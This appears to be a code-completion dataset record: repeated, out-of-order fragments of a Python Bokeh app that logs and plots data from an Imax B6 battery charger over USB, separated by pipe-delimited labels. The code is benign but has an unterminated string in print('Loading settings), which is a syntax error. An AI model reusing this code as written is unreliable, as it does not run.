#label = "Start": and device_started = False is initial start up condition
if button_startstop.label == "Start":
button_startstop.label = "Connecting"
settings['device_started'] = start_device()
#returns True if device found,connected and started
if settings['device_started']:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax found & running.')
button_startstop.label = "Stop"
settings['start_cycle'] = curdoc().add_periodic_callback(update, 10000)
print('device found')
else:
if not settings['device_started']:
button_startstop.label = "Start"
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax start failed. Check everything')
else: #deal with stop conditions; user pressed app stop button, or run_status > 1 (imax buttons pressed.)
if button_startstop.label == "Stop":
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Run stopped.')
curdoc().remove_periodic_callback(settings['start_cycle'])
get_final_data()
button_startstop.label = "Start"
if "Li" in settings['bat_type']:
add_lines(p1, source, cells_num = int(settings['cells']))
button_startstop.on_click(button_startstop_handler)
def read_imax():
global read_data
global device_dict
# see above call to start_imax() for globals set from imax.py
#global data_out_packet
global out_data
#global run_status
device = device_dict['device']
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
#send the host->imax packet to trigger imax to fill buffer and do imax->host transfer
#make sure device is still connected
w_out = device.write(EndPt_out, settings['data_out_packet'])
try:
data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize) #using more general form of Endpoint_IN attributes
except Exception as e:
print('Something went wrong: no data incoming; error is: ', e)
sys.exit()
#Parse the hex data
out_data['mah'] = [int(str(data[5]*256 + data[6]))] #capacity, mah
out_data['timer'] = [int(str(data[7]*256 + data[8]))] #seconds
out_data['volts'] = [int(str(data[9]*256 + data[10]))] #volts
out_data['current'] = [int(str(data[11]*256 + data[12]))] #amps
out_data['ext_T'] = [int(str(data[13]))]
out_data['internal_T'] = [int(str(data[14]))] #deg. C?
out_data['cell1'] = [int(str(data[17]*256 + data[18]))] #cell 1 etc.
out_data['cell2'] = [int(str(data[19]*256 + data[20]))]
out_data['cell3'] = [int(str(data[21]*256 + data[22]))]
out_data['cell4'] = [int(str(data[23]*256 + data[24]))]
out_data['cell5'] = [int(str(data[25]*256 + data[26]))]
out_data['cell6'] = [int(str(data[27]*256 + data[28]))]
read_data['mah'].append(int(str(data[5]*256 + data[6]))) #capacity, mah
read_data['timer'].append(int(str(data[7]*256 + data[8]))) #seconds
read_data['volts'].append(int(str(data[9]*256 + data[10]))) #volts
read_data['current'].append(int(str(data[11]*256 + data[12]))) #amps
read_data['ext_T'].append(int(str(data[13])))
read_data['internal_T'].append(int(str(data[14]))) #deg. C?
read_data['cell1'].append(int(str(data[17]*256 + data[18])))
read_data['cell2'].append(int(str(data[19]*256 + data[20])))
read_data['cell3'].append(int(str(data[21]*256 + data[22])))
read_data['cell4'].append(int(str(data[23]*256 + data[24])))
read_data['cell5'].append(int(str(data[25]*256 + data[26])))
read_data['cell6'].append(int(str(data[27]*256 + data[28])))
#print the data (same sequence Milek7 used with hidapi; much appreciated effort.
print(
str(data[4]) + ", " + #state
str(data[5] * 256 + data[6]) + ", " + #energy
str(data[7] * 256 + data[8]) + ", " + #timer
str((data[9] * 256 + data[10]) / 1000.0) + ", " + #voltage
str((data[11] * 256 + data[12]) / 1000.0) + ", " + #current
str(data[13]) + ", " + #ext temp
str(data[14]) + ", " + #int temp
str((data[17] * 256 + data[18]) / 1000.0) + ", " + #cell 1
str((data[19] * 256 + data[20]) / 1000.0) + ", " + #cels 2
str((data[21] * 256 + data[22]) / 1000.0) + ", " + #cell 3
str((data[23] * 256 + data[24]) / 1000.0) + ", " + #cell 4
str((data[25] * 256 + data[26]) / 1000.0) + ", " + #cell 5
str((data[27] * 256 + data[28]) / 1000.0) #cell 6
)
#Has the charger been stopped by pressing the charger Stop button?
settings['run_status'] = int(str(data[4]))
return settings['run_status'], out_data
#initialize read_data dictionary for plots
out_data = {'mah':[0], 'timer':[0], 'volts':[0], 'current':[0],
'ext_T':[0], 'internal_T':[0], 'cell1':[0], 'cell2':[0],
'cell3':[0],'cell4':[0], 'cell5':[0], 'cell6':[0]}
#time_interval = 5 #seconds
source = ColumnDataSource(data = out_data)
#Generate two plots, for capacity and voltage
p = figure(plot_width=400, plot_height=400)
p.title.text = "Capactiy Input vs. Charge Time"
p.title.text_color = "black"
p.title.text_font = "arial"
p.title.text_font_style = "bold"
p.yaxis.minor_tick_line_color = "black"
p.xaxis.axis_label = "Time, s"
p.yaxis.axis_label = "Capacity Added(mah)"
r_cap = p.line(x = 'timer', y = 'mah', source = source, color="red", line_width=2)
#Set the voltabe plot; complicated a bit by battery type
p1 = figure(plot_width=400, plot_height=400)
p1.title.text = "Voltage vs. Charge Time"
p1.title.text_color = "black"
p1.title.text_font = "arial"
p1.title.text_font_style = "bold"
p1.yaxis.minor_tick_line_color = "black"
p1.xaxis.axis_label = "Time, s"
p1.yaxis.axis_label = "Voltage. mV"
rx = p1.line(x = 'timer', y = 'volts', source = source, color = "firebrick", line_width=2)
"""
#test block for adding lines
if "Li" in bat_type:
r1 = p1.line(x ='timer', y = 'cell1', source = source, color="orange", line_width=2)
r2 = p1.line(x ='timer', y = 'cell2', source = source, color="yellow", line_width=2)
r3 = p1.line(x ='timer', y = 'cell3', source = source, color="green", line_width=2)
r4 = p1.line(x ='timer', y = 'cell4', source = source, color="blue", line_width=2)
r5 = p1.line(x ='timer', y = 'cell5', source = source, color="violet", line_width=2)
r6 = p1.line(x ='timer', y = 'cell6', source = source, color="darkmagenta", line_width=2)
"""
def update():
global out_data
global source
global device_dict
device = device_dict['device']
if device:
#note "new_data" is bokeh specific to only add to source
settings['run_status'], new_data = read_imax()
#print('read_imax returned run status: ', settings['run_status'])
if settings['run_status'] < 2 and button_startstop.label == "Stop":
source.stream(new_data) # 20)
else:
msg = '; User stopped run from imax stop button.'
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_startstop_handler()
else:
msg = '; Device no longer connected.'
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_startstop_handler()
"""
class Cycler(update()):
msg = "Message from Cycler"
start_cycle = staticmethod(curdoc().add_periodic_callback(update, 10000))
stop_cycle = staticmethod(curdoc().remove_periodic_callback(start_cycle))
# create the widgets
"""
#start_cycle = curdoc().add_periodic_callback(update, 10000) #time in milliseconds
#w1 = row(select_battype, select_chrg_type) #, width = 300) #sizing_mode = 'fixed')
w1 = widgetbox(select_battype, select_chrg_type, select_cells) #, width = 300) #sizing_mode = 'fixed')
w2 = widgetbox(maxmah_slider) #, sizing_mode='fixed')
w3 = widgetbox(text_input) #, sizing_mode = 'fixed')
w4 = widgetbox(button_startstop, button_save )#, sizing_mode ='fixed')
w5 = widgetbox(DC_radio_group, select_cycles)
w6 = widgetbox(data_table)
"""
Layit = layout([row(column(
[notice1],
[w1],
[w2],
[w3],
[w4],
[w5],
[data_table]),
column(p, p1))], sizing_mode='fixed')
"""
#Layit = gridplot([[column([p, p1]), widgetbox(w1.children+w2.children+w3.children+w4.children+w5.children)]])
curdoc().add_root(notice1)
Layit = gridplot([[widgetbox(w1.children+w2.children+w3.children+w4.children+w5.children,), column([p, p1])]])
curdoc().add_root(Layit)
curdoc().add_root(data_table)
#curdoc().add_root(p)
#curdoc().add_root(p1)
#interval is not constant,
#based on derivative of capacity
# Add a periodic callback to be run every 500 milliseconds
#curdoc().add_periodic_callback(update, 500)
#for running textarea update following is one way to do it with js
"""
textare udating w/ jquery and textarea
var txt = document.getElementById('log');
setInterval(function(){txt.value += '\ntest';},2000);
<textarea id='log' rows=50 cols=60 autofocus></textarea>
""" | device_str = imax_0.find_my_device() #returns msg which has "No" in it ,if device not found
if "No" in device_str:
if datetime.datetime.now()> futuretime:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Could not find device; check device and connection.')
return False
time.sleep(1) | conditional_block |
imax_logger.py | """
Bokah interface for Imax B6 mini charnger
Requires: bokeh - pip install bokuh
but calls imax_0.py; see imax_0.py for additional necessary library packages
"""
import sys
import time
import datetime
from bokeh.models import ColumnDataSource, Slider, DataTable, TableColumn
from bokeh.plotting import Figure, output_file, show
from bokeh.plotting import figure, output_file, show
from bokeh.io import output_file, show
from bokeh.layouts import widgetbox, column, row
from bokeh.models.widgets import Button, RadioButtonGroup, Select, Slider, RadioGroup, Div, TextInput
from bokeh.layouts import gridplot, layout
from bokeh.plotting import curdoc
from bokeh.driving import linear
from bokeh.models.callbacks import CustomJS
#specify varibles for the inputs.
bat_type = ""
chrg_type = ""
nominal_mah = 0
DC_or_CD = "Discharge/Charge"
cycles = 1
cells = 4
run_text = "Enter run information"
time_interval = 10 #seconds
final_read = {'final_mah':"", 'final_t':"", 'final_V':"", 'final_T':""}
#next is set in start_device(), which is obtained from imax_0.start_imax
device_dict = {'device':None, 'EndPt_out':None, 'EndPt_in':None}
text_update = None
settings_dict = {}
read_data = {}
data_out_packet = []
device_started = False
out_data = {}
start_cycle = None
run_status = 0
#create a dictionary of initial values to minimize global calls
settings = {
'bat_type':bat_type,
'cells':cells,
'chrg_type':chrg_type,
'nominal_mah':nominal_mah,
'DC_or_CD':DC_or_CD,
'cycles':cycles,
'device_started':device_started,
'time_interval':time_interval,
'start_cycle':start_cycle,
'run_text':run_text,
'run_status':run_status,
'final_out':final_read,
'data_out_packet':data_out_packet,
'settings_dict':settings_dict,
'device_dict':device_dict
}
#Create the header for page
notice1 = Div(text="""The data input here are for logging identification and saving conditions, which are already manually chosen
on the imax. They do not set or reset the imax.""",
sizing_mode = "scale_width")
select_battype = Select(title = "Battery Type", value ="", options = ['NiMH', 'NiCd', 'LiPO', 'LiFe', 'LiIO', 'LiHV'])
def select_battype_handler(attr, old, new):
settings['bat_type'] = new
select_battype.on_change('value', select_battype_handler)
select_chrg_type = Select(title="Charge Type", value="Charge", options=["Charge", "Discharge", "Cycle", "Re-Peak", "AutoCharge", "Balance Charge", "Fast Charge", "Storage"])
def select_chrg_type_handler(attr, old, new):
settings['chrg_type'] = new
select_chrg_type.on_change('value', select_chrg_type_handler)
maxmah_slider = Slider(start=50, end=24000, value=1, step=50, title="Bat. Specified Capacity, mah")
def maxmah_handler(attr, old, new):
settings['nominal_mah'] = new
maxmah_slider.on_change('value', maxmah_handler)
DC_radio_group = RadioGroup(labels=["Discharge/Charge", "Charge/Discharge"], active=0)
def DC_radio_handler(new):
|
DC_radio_group.on_click(DC_radio_handler)
select_cells = Select(title = "No. of Cells", value ="4", options = [str(i) for i in range(1,13)])
def select_cells_handler(attr, old, new):
settings['cells'] = new
select_cells.on_change('value', select_cells_handler)
#imax discharge/charge # of cycles; imax limit is 5
#no way to read this from imax only shows up in set up packet
select_cycles = Select(title = "Cycles", value ="1", options = [str(i) for i in range(1,6)])
def select_cycles_handler(attr, old, new):
settings['cycles'] = new
select_cycles.on_change('value', select_cycles_handler)
text_input = TextInput(value="Enter run information", title="Run Info::")
def text_input_handler(attr, old, new):
settings['run_text'] = new
text_input.on_change("value", text_input_handler)
textsource = ColumnDataSource(data=dict(time = [],msg = []))
columns = [
TableColumn(field="time", title="Time"),
TableColumn(field="msg", title="Msg", width = 600)]
data_table = DataTable(source=textsource, columns=columns, width=600)
button_save = Button(label="Save Run", button_type = 'warning')
def button_save_handler():
global read_data
print('button save worked')
run_modes= {'bat_type':settings['bat_type'], 'chrg_type':settings['chrg_type'], 'nominal_mah':settings['nominal_mah'],
'DC_or_CD':settings['DC_or_CD'], 'cycles':settings['cycles'], 'cells':settings['cells'], 'run_text':settings['run_text']}
excel_out = imax_0.write_excel_file(run_modes, settings['final_read'], read_data, settings['settings_dict'])
msg = 'Data saved to: ' + excel_out
print(msg)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_save.on_click(button_save_handler)
def text_update(t, msg):
global data_table
print('time and msg: ', t, msg)
new_data = dict(time=[t], msg=[msg],)
textsource.stream(new_data, 20) #adding the value is a scrolloff lines
data_table.update()
import imax_0
def check_device_status():
global device_dict
#used by startstop btn handler to determine if imax start btn was pressed, or imax running.
#global device_dict
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
device = device_dict['device']
#send host->imax packet to trigger imax to do imax->host transfer
#make sure device is still connected
if device:
w_out = device.write(EndPt_out, settings['data_out_packet'])
data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize)
settings['run_status'] = int(str(data[4]))
return settings['run_status']
else:
print('Check device failed.')
return None
def get_final_data():
global device_dict
device = device_dict['device']
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
final_out = [0x0f, 0x03, 0xfe, 0x000, 0xfe, 0xff, 0xff] + [0]*57
w_out = device.write(EndPt_out, final_out)
final_data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize)
if final_data:
final_mah = str(final_data[5] * 256 + final_data[6]) #energy
final_t = str(final_data[7] * 256 + final_data[8]) #timer sec
final_V = str((final_data[9] * 256 + final_data[10]) / 1000.0) #voltage, V
final_T = str(final_data[14]) #Temperature, deg C, if F???
#int temp
settings['final_read'] = {'final_mah':final_mah, 'final_t':final_t, 'final_V':final_V, 'final_T':final_T}
msg = 'Run completed. Final values: ' + final_mah + ' mah; '+ final_V + ' mV; ' + final_t + ' s.'
print(msg)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
def start_device():
global read_data
global device_dict
#sets up device if connected, returns imax settings, configrs, and sets data dictionary.
#check for device, if not there wait for connection.
device_str = imax_0.find_my_device() #returns True if device found
if "No" in device_str:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), device_str)
print(device_str)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax offline. Cycling for one minute.')
nowtime = datetime.datetime.now()
futuretime = datetime.datetime.now() + datetime.timedelta(minutes = 1)
while "No" in device_str:
device_str = imax_0.find_my_device() #returns msg which has "No" in it ,if device not found
if "No" in device_str:
if datetime.datetime.now()> futuretime:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Could not find device; check device and connection.')
return False
time.sleep(1)
print('device found')
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), device_str)
#device was found, engage device, get parameters and dictionaries
device_dict, read_data, settings_dict, data_out_packet = imax_0.start_imax()
print('Loading settings)
settings['settings_dict'] = settings_dict
settings['data_out_packet'] = data_out_packet
#Determine if device is idling, or already running: run_status = 2 or 3, or is running = 1
settings['run_status'] = check_device_status()
nowtime = datetime.datetime.now()
futuretime = datetime.datetime.now() + datetime.timedelta(minutes = 1)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Waiting for Imax button press for one minute.')
while settings['run_status'] > 1:
settings['run_status'] = check_device_status()
if datetime.datetime.now()> futuretime:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax button not pressed in 1 min...aborting start.')
return False
time.sleep(1)
print('out of loop run_status is: ', settings['run_status'])
return True
def add_lines(plot, source, cells_num = 0):
#called from button_startstop_handler if bat_type LiPO, note cells must be > 1
color_list = ['orange', 'yellow', 'green', 'blue', 'violet', 'darkmagenta']
if cells_num > 1:
for i in range(cells_num):
p1.line(x = 'timer', y = 'cell'+ str(i+1), source = source, color = color_list[i], line_width = 2)
button_startstop = Button(label = "Start", button_type = 'success')
def button_startstop_handler():
global button_startstop
#read btn label and isas driver for condition
#label = "Start": and device_started = False is initial start up condition
if button_startstop.label == "Start":
button_startstop.label = "Connecting"
settings['device_started'] = start_device()
#returns True if device found,connected and started
if settings['device_started']:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax found & running.')
button_startstop.label = "Stop"
settings['start_cycle'] = curdoc().add_periodic_callback(update, 10000)
print('device found')
else:
if not settings['device_started']:
button_startstop.label = "Start"
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax start failed. Check everything')
else: #deal with stop conditions; user pressed app stop button, or run_status > 1 (imax buttons pressed.)
if button_startstop.label == "Stop":
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Run stopped.')
curdoc().remove_periodic_callback(settings['start_cycle'])
get_final_data()
button_startstop.label = "Start"
if "Li" in settings['bat_type']:
add_lines(p1, source, cells_num = int(settings['cells']))
button_startstop.on_click(button_startstop_handler)
def read_imax():
global read_data
global device_dict
# see above call to start_imax() for globals set from imax.py
#global data_out_packet
global out_data
#global run_status
device = device_dict['device']
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
#send the host->imax packet to trigger imax to fill buffer and do imax->host transfer
#make sure device is still connected
w_out = device.write(EndPt_out, settings['data_out_packet'])
try:
data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize) #using more general form of Endpoint_IN attributes
except Exception as e:
print('Something went wrong: no data incoming; error is: ', e)
sys.exit()
#Parse the hex data
out_data['mah'] = [int(str(data[5]*256 + data[6]))] #capacity, mah
out_data['timer'] = [int(str(data[7]*256 + data[8]))] #seconds
out_data['volts'] = [int(str(data[9]*256 + data[10]))] #volts
out_data['current'] = [int(str(data[11]*256 + data[12]))] #amps
out_data['ext_T'] = [int(str(data[13]))]
out_data['internal_T'] = [int(str(data[14]))] #deg. C?
out_data['cell1'] = [int(str(data[17]*256 + data[18]))] #cell 1 etc.
out_data['cell2'] = [int(str(data[19]*256 + data[20]))]
out_data['cell3'] = [int(str(data[21]*256 + data[22]))]
out_data['cell4'] = [int(str(data[23]*256 + data[24]))]
out_data['cell5'] = [int(str(data[25]*256 + data[26]))]
out_data['cell6'] = [int(str(data[27]*256 + data[28]))]
read_data['mah'].append(int(str(data[5]*256 + data[6]))) #capacity, mah
read_data['timer'].append(int(str(data[7]*256 + data[8]))) #seconds
read_data['volts'].append(int(str(data[9]*256 + data[10]))) #volts
read_data['current'].append(int(str(data[11]*256 + data[12]))) #amps
read_data['ext_T'].append(int(str(data[13])))
read_data['internal_T'].append(int(str(data[14]))) #deg. C?
read_data['cell1'].append(int(str(data[17]*256 + data[18])))
read_data['cell2'].append(int(str(data[19]*256 + data[20])))
read_data['cell3'].append(int(str(data[21]*256 + data[22])))
read_data['cell4'].append(int(str(data[23]*256 + data[24])))
read_data['cell5'].append(int(str(data[25]*256 + data[26])))
read_data['cell6'].append(int(str(data[27]*256 + data[28])))
#print the data (same sequence Milek7 used with hidapi; much appreciated effort.
print(
str(data[4]) + ", " + #state
str(data[5] * 256 + data[6]) + ", " + #energy
str(data[7] * 256 + data[8]) + ", " + #timer
str((data[9] * 256 + data[10]) / 1000.0) + ", " + #voltage
str((data[11] * 256 + data[12]) / 1000.0) + ", " + #current
str(data[13]) + ", " + #ext temp
str(data[14]) + ", " + #int temp
str((data[17] * 256 + data[18]) / 1000.0) + ", " + #cell 1
str((data[19] * 256 + data[20]) / 1000.0) + ", " + #cels 2
str((data[21] * 256 + data[22]) / 1000.0) + ", " + #cell 3
str((data[23] * 256 + data[24]) / 1000.0) + ", " + #cell 4
str((data[25] * 256 + data[26]) / 1000.0) + ", " + #cell 5
str((data[27] * 256 + data[28]) / 1000.0) #cell 6
)
#Has the charger been stopped by pressing the charger Stop button?
settings['run_status'] = int(str(data[4]))
return settings['run_status'], out_data
#initialize read_data dictionary for plots
out_data = {'mah':[0], 'timer':[0], 'volts':[0], 'current':[0],
'ext_T':[0], 'internal_T':[0], 'cell1':[0], 'cell2':[0],
'cell3':[0],'cell4':[0], 'cell5':[0], 'cell6':[0]}
#time_interval = 5 #seconds
source = ColumnDataSource(data = out_data)
#Generate two plots, for capacity and voltage
p = figure(plot_width=400, plot_height=400)
p.title.text = "Capactiy Input vs. Charge Time"
p.title.text_color = "black"
p.title.text_font = "arial"
p.title.text_font_style = "bold"
p.yaxis.minor_tick_line_color = "black"
p.xaxis.axis_label = "Time, s"
p.yaxis.axis_label = "Capacity Added(mah)"
r_cap = p.line(x = 'timer', y = 'mah', source = source, color="red", line_width=2)
#Set the voltabe plot; complicated a bit by battery type
p1 = figure(plot_width=400, plot_height=400)
p1.title.text = "Voltage vs. Charge Time"
p1.title.text_color = "black"
p1.title.text_font = "arial"
p1.title.text_font_style = "bold"
p1.yaxis.minor_tick_line_color = "black"
p1.xaxis.axis_label = "Time, s"
p1.yaxis.axis_label = "Voltage. mV"
rx = p1.line(x = 'timer', y = 'volts', source = source, color = "firebrick", line_width=2)
"""
#test block for adding lines
if "Li" in bat_type:
r1 = p1.line(x ='timer', y = 'cell1', source = source, color="orange", line_width=2)
r2 = p1.line(x ='timer', y = 'cell2', source = source, color="yellow", line_width=2)
r3 = p1.line(x ='timer', y = 'cell3', source = source, color="green", line_width=2)
r4 = p1.line(x ='timer', y = 'cell4', source = source, color="blue", line_width=2)
r5 = p1.line(x ='timer', y = 'cell5', source = source, color="violet", line_width=2)
r6 = p1.line(x ='timer', y = 'cell6', source = source, color="darkmagenta", line_width=2)
"""
def update():
global out_data
global source
global device_dict
device = device_dict['device']
if device:
#note "new_data" is bokeh specific to only add to source
settings['run_status'], new_data = read_imax()
#print('read_imax returned run status: ', settings['run_status'])
if settings['run_status'] < 2 and button_startstop.label == "Stop":
source.stream(new_data) # 20)
else:
msg = '; User stopped run from imax stop button.'
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_startstop_handler()
else:
msg = '; Device no longer connected.'
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_startstop_handler()
"""
class Cycler(update()):
msg = "Message from Cycler"
start_cycle = staticmethod(curdoc().add_periodic_callback(update, 10000))
stop_cycle = staticmethod(curdoc().remove_periodic_callback(start_cycle))
# create the widgets
"""
#start_cycle = curdoc().add_periodic_callback(update, 10000) #time in milliseconds
#w1 = row(select_battype, select_chrg_type) #, width = 300) #sizing_mode = 'fixed')
w1 = widgetbox(select_battype, select_chrg_type, select_cells) #, width = 300) #sizing_mode = 'fixed')
w2 = widgetbox(maxmah_slider) #, sizing_mode='fixed')
w3 = widgetbox(text_input) #, sizing_mode = 'fixed')
w4 = widgetbox(button_startstop, button_save )#, sizing_mode ='fixed')
w5 = widgetbox(DC_radio_group, select_cycles)
w6 = widgetbox(data_table)
"""
Layit = layout([row(column(
[notice1],
[w1],
[w2],
[w3],
[w4],
[w5],
[data_table]),
column(p, p1))], sizing_mode='fixed')
"""
#Layit = gridplot([[column([p, p1]), widgetbox(w1.children+w2.children+w3.children+w4.children+w5.children)]])
curdoc().add_root(notice1)
Layit = gridplot([[widgetbox(w1.children+w2.children+w3.children+w4.children+w5.children,), column([p, p1])]])
curdoc().add_root(Layit)
curdoc().add_root(data_table)
#curdoc().add_root(p)
#curdoc().add_root(p1)
#interval is not constant,
#based on derivative of capacity
# Add a periodic callback to be run every 500 milliseconds
#curdoc().add_periodic_callback(update, 500)
#for running textarea update following is one way to do it with js
"""
textare udating w/ jquery and textarea
var txt = document.getElementById('log');
setInterval(function(){txt.value += '\ntest';},2000);
<textarea id='log' rows=50 cols=60 autofocus></textarea>
""" | settings['DC'] = new | identifier_body |
imax_logger.py | """
Bokah interface for Imax B6 mini charnger
Requires: bokeh - pip install bokuh
but calls imax_0.py; see imax_0.py for additional necessary library packages
"""
import sys
import time
import datetime
from bokeh.models import ColumnDataSource, Slider, DataTable, TableColumn
from bokeh.plotting import Figure, output_file, show
from bokeh.plotting import figure, output_file, show
from bokeh.io import output_file, show
from bokeh.layouts import widgetbox, column, row
from bokeh.models.widgets import Button, RadioButtonGroup, Select, Slider, RadioGroup, Div, TextInput
from bokeh.layouts import gridplot, layout
from bokeh.plotting import curdoc
from bokeh.driving import linear
from bokeh.models.callbacks import CustomJS
#specify varibles for the inputs.
bat_type = ""
chrg_type = ""
nominal_mah = 0
DC_or_CD = "Discharge/Charge"
cycles = 1
cells = 4
run_text = "Enter run information"
time_interval = 10 #seconds
final_read = {'final_mah':"", 'final_t':"", 'final_V':"", 'final_T':""}
#next is set in start_device(), which is obtained from imax_0.start_imax
device_dict = {'device':None, 'EndPt_out':None, 'EndPt_in':None}
text_update = None
settings_dict = {}
read_data = {}
data_out_packet = []
device_started = False
out_data = {}
start_cycle = None
run_status = 0
#create a dictionary of initial values to minimize global calls
settings = {
'bat_type':bat_type,
'cells':cells,
'chrg_type':chrg_type,
'nominal_mah':nominal_mah,
'DC_or_CD':DC_or_CD,
'cycles':cycles,
'device_started':device_started,
'time_interval':time_interval,
'start_cycle':start_cycle,
'run_text':run_text,
'run_status':run_status,
'final_out':final_read,
'data_out_packet':data_out_packet, | #Create the header for page
notice1 = Div(text="""The data input here are for logging identification and saving conditions, which are already manually chosen
on the imax. They do not set or reset the imax.""",
sizing_mode = "scale_width")
select_battype = Select(title = "Battery Type", value ="", options = ['NiMH', 'NiCd', 'LiPO', 'LiFe', 'LiIO', 'LiHV'])
def select_battype_handler(attr, old, new):
settings['bat_type'] = new
select_battype.on_change('value', select_battype_handler)
select_chrg_type = Select(title="Charge Type", value="Charge", options=["Charge", "Discharge", "Cycle", "Re-Peak", "AutoCharge", "Balance Charge", "Fast Charge", "Storage"])
def select_chrg_type_handler(attr, old, new):
settings['chrg_type'] = new
select_chrg_type.on_change('value', select_chrg_type_handler)
maxmah_slider = Slider(start=50, end=24000, value=1, step=50, title="Bat. Specified Capacity, mah")
def maxmah_handler(attr, old, new):
settings['nominal_mah'] = new
maxmah_slider.on_change('value', maxmah_handler)
DC_radio_group = RadioGroup(labels=["Discharge/Charge", "Charge/Discharge"], active=0)
def DC_radio_handler(new):
settings['DC'] = new
DC_radio_group.on_click(DC_radio_handler)
select_cells = Select(title = "No. of Cells", value ="4", options = [str(i) for i in range(1,13)])
def select_cells_handler(attr, old, new):
settings['cells'] = new
select_cells.on_change('value', select_cells_handler)
#imax discharge/charge # of cycles; imax limit is 5
#no way to read this from imax only shows up in set up packet
select_cycles = Select(title = "Cycles", value ="1", options = [str(i) for i in range(1,6)])
def select_cycles_handler(attr, old, new):
settings['cycles'] = new
select_cycles.on_change('value', select_cycles_handler)
text_input = TextInput(value="Enter run information", title="Run Info::")
def text_input_handler(attr, old, new):
settings['run_text'] = new
text_input.on_change("value", text_input_handler)
textsource = ColumnDataSource(data=dict(time = [],msg = []))
columns = [
TableColumn(field="time", title="Time"),
TableColumn(field="msg", title="Msg", width = 600)]
data_table = DataTable(source=textsource, columns=columns, width=600)
button_save = Button(label="Save Run", button_type = 'warning')
def button_save_handler():
global read_data
print('button save worked')
run_modes= {'bat_type':settings['bat_type'], 'chrg_type':settings['chrg_type'], 'nominal_mah':settings['nominal_mah'],
'DC_or_CD':settings['DC_or_CD'], 'cycles':settings['cycles'], 'cells':settings['cells'], 'run_text':settings['run_text']}
excel_out = imax_0.write_excel_file(run_modes, settings['final_read'], read_data, settings['settings_dict'])
msg = 'Data saved to: ' + excel_out
print(msg)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_save.on_click(button_save_handler)
def text_update(t, msg):
global data_table
print('time and msg: ', t, msg)
new_data = dict(time=[t], msg=[msg],)
textsource.stream(new_data, 20) #adding the value is a scrolloff lines
data_table.update()
import imax_0
def check_device_status():
global device_dict
#used by startstop btn handler to determine if imax start btn was pressed, or imax running.
#global device_dict
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
device = device_dict['device']
#send host->imax packet to trigger imax to do imax->host transfer
#make sure device is still connected
if device:
w_out = device.write(EndPt_out, settings['data_out_packet'])
data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize)
settings['run_status'] = int(str(data[4]))
return settings['run_status']
else:
print('Check device failed.')
return None
def get_final_data():
global device_dict
device = device_dict['device']
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
final_out = [0x0f, 0x03, 0xfe, 0x000, 0xfe, 0xff, 0xff] + [0]*57
w_out = device.write(EndPt_out, final_out)
final_data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize)
if final_data:
final_mah = str(final_data[5] * 256 + final_data[6]) #energy
final_t = str(final_data[7] * 256 + final_data[8]) #timer sec
final_V = str((final_data[9] * 256 + final_data[10]) / 1000.0) #voltage, V
final_T = str(final_data[14]) #Temperature, deg C, if F???
#int temp
settings['final_read'] = {'final_mah':final_mah, 'final_t':final_t, 'final_V':final_V, 'final_T':final_T}
msg = 'Run completed. Final values: ' + final_mah + ' mah; '+ final_V + ' mV; ' + final_t + ' s.'
print(msg)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
def start_device():
global read_data
global device_dict
#sets up device if connected, returns imax settings, configrs, and sets data dictionary.
#check for device, if not there wait for connection.
device_str = imax_0.find_my_device() #returns True if device found
if "No" in device_str:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), device_str)
print(device_str)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax offline. Cycling for one minute.')
nowtime = datetime.datetime.now()
futuretime = datetime.datetime.now() + datetime.timedelta(minutes = 1)
while "No" in device_str:
device_str = imax_0.find_my_device() #returns msg which has "No" in it ,if device not found
if "No" in device_str:
if datetime.datetime.now()> futuretime:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Could not find device; check device and connection.')
return False
time.sleep(1)
print('device found')
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), device_str)
#device was found, engage device, get parameters and dictionaries
device_dict, read_data, settings_dict, data_out_packet = imax_0.start_imax()
print('Loading settings)
settings['settings_dict'] = settings_dict
settings['data_out_packet'] = data_out_packet
#Determine if device is idling, or already running: run_status = 2 or 3, or is running = 1
settings['run_status'] = check_device_status()
nowtime = datetime.datetime.now()
futuretime = datetime.datetime.now() + datetime.timedelta(minutes = 1)
